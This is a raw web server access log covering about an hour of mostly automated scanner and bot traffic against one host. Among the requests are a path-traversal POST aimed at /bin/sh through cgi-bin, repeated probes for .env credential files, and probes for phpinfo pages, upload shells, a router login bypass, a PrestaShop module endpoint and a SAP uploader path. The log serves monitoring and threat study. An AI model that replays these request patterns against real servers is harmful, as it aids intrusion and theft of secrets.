107.173.37.111 - - [01/Jul/2025:01:17:53 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
91.244.197.102 - - [01/Jul/2025:01:18:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.79.208.213 - - [01/Jul/2025:01:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
108.165.153.6 - - [01/Jul/2025:01:18:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.127.222 - - [01/Jul/2025:01:18:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.127.222 - - [01/Jul/2025:01:18:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.187.8.174 - - [01/Jul/2025:01:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
34.52.158.102 - - [01/Jul/2025:01:19:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
87.121.84.130 - - [01/Jul/2025:01:20:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
108.165.153.6 - - [01/Jul/2025:01:21:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.73.109 - - [01/Jul/2025:01:22:47 +0200] "GET /debug HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
108.165.153.6 - - [01/Jul/2025:01:23:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.152 - - [01/Jul/2025:01:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:15 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:16 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:16 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:16 +0200] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:16 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:16 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:24:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.10.162 - - [01/Jul/2025:01:24:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.223 - - [01/Jul/2025:01:26:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.223 - - [01/Jul/2025:01:26:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
108.165.153.6 - - [01/Jul/2025:01:26:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.7 - - [01/Jul/2025:01:28:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:01:28:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.73.109 - - [01/Jul/2025:01:28:50 +0200] "GET /debug HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24"
80.82.77.202 - - [01/Jul/2025:01:30:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
141.98.11.83 - - [01/Jul/2025:01:30:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [01/Jul/2025:01:30:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
80.82.77.202 - - [01/Jul/2025:01:30:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
108.165.153.7 - - [01/Jul/2025:01:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.244.197.102 - - [01/Jul/2025:01:31:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [01/Jul/2025:01:31:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
108.165.153.6 - - [01/Jul/2025:01:32:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.127.222 - - [01/Jul/2025:01:32:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:01:35:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.72 - - [01/Jul/2025:01:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.72 - - [01/Jul/2025:01:36:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.72 - - [01/Jul/2025:01:36:57 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.72 - - [01/Jul/2025:01:37:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.72 - - [01/Jul/2025:01:37:12 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.72 - - [01/Jul/2025:01:37:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
206.168.34.72 - - [01/Jul/2025:01:37:18 +0200] "GET /wiki HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.191.127.222 - - [01/Jul/2025:01:37:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.127 - - [01/Jul/2025:01:38:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.114 - - [01/Jul/2025:01:39:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.83 - - [01/Jul/2025:01:39:45 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
80.251.153.117 - - [01/Jul/2025:01:41:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
152.42.142.232 - - [01/Jul/2025:01:41:15 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
91.244.197.102 - - [01/Jul/2025:01:41:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
160.187.246.170 - - [01/Jul/2025:01:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.74 - - [01/Jul/2025:01:43:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
108.165.153.7 - - [01/Jul/2025:01:46:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.83 - - [01/Jul/2025:01:46:29 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
141.98.11.152 - - [01/Jul/2025:01:46:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:01:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
108.165.153.7 - - [01/Jul/2025:01:46:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.244.197.102 - - [01/Jul/2025:01:47:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.7 - - [01/Jul/2025:01:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.10.162 - - [01/Jul/2025:01:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.251.153.117 - - [01/Jul/2025:01:51:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:01:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.7 - - [01/Jul/2025:01:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:01:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.131.155.254 - - [01/Jul/2025:01:53:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:01:53:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:01:53:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:01:53:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0"
80.251.153.117 - - [01/Jul/2025:01:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.90.153.48 - - [01/Jul/2025:01:54:13 +0200] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
77.90.153.48 - - [01/Jul/2025:01:54:16 +0200] "POST /modules/appagebuilder/apajax.php?rand=1018546128229 HTTP/1.1" 404 337 "http://212.91.246.88" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [01/Jul/2025:01:54:19 +0200] "POST /modules/appagebuilder/apajax.php?rand=7850983901074 HTTP/1.1" 404 337 "http://212.91.246.88" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
77.90.153.48 - - [01/Jul/2025:01:54:21 +0200] "POST /modules/appagebuilder/apajax.php?rand=2808048786141 HTTP/1.1" 404 337 "http://212.91.246.88" "Mozilla/5.0 (ZZ; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
216.244.66.236 - - [01/Jul/2025:01:55:05 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
77.90.153.48 - - [01/Jul/2025:01:56:10 +0200] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 353 "-" "-"
77.90.153.48 - - [01/Jul/2025:01:56:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.153.48 - - [01/Jul/2025:01:56:10 +0200] "GET /sap/admin/public/default.html HTTP/1.1" 404 334 "-" "-"
77.90.153.48 - - [01/Jul/2025:01:56:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
108.165.153.7 - - [01/Jul/2025:01:56:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.83 - - [01/Jul/2025:01:56:42 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
49.51.73.183 - - [01/Jul/2025:01:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
108.165.153.7 - - [01/Jul/2025:01:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:48 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:48 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:48 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:48 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
45.83.31.49 - - [01/Jul/2025:01:59:48 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
108.165.153.7 - - [01/Jul/2025:02:00:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
160.30.44.120 - - [01/Jul/2025:02:00:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
108.165.153.7 - - [01/Jul/2025:02:03:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.64.106.71 - - [01/Jul/2025:02:06:14 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:07:11 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:07:29 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:07:33 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:08:35 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
198.235.24.98 - - [01/Jul/2025:02:08:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.98 - - [01/Jul/2025:02:08:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
49.51.233.46 - - [01/Jul/2025:02:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
20.64.106.71 - - [01/Jul/2025:02:09:42 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:09:44 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
20.64.106.71 - - [01/Jul/2025:02:09:47 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
20.51.234.214 - - [01/Jul/2025:02:09:54 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
146.190.158.94 - - [01/Jul/2025:02:09:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 OPR/28.0.1750.40"
20.51.234.214 - - [01/Jul/2025:02:10:23 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:10:32 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:10:40 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:10:54 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:11:16 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:11:27 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:11:37 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:12:05 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
20.51.234.214 - - [01/Jul/2025:02:13:06 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
176.65.148.166 - - [01/Jul/2025:02:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.83 - - [01/Jul/2025:02:16:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
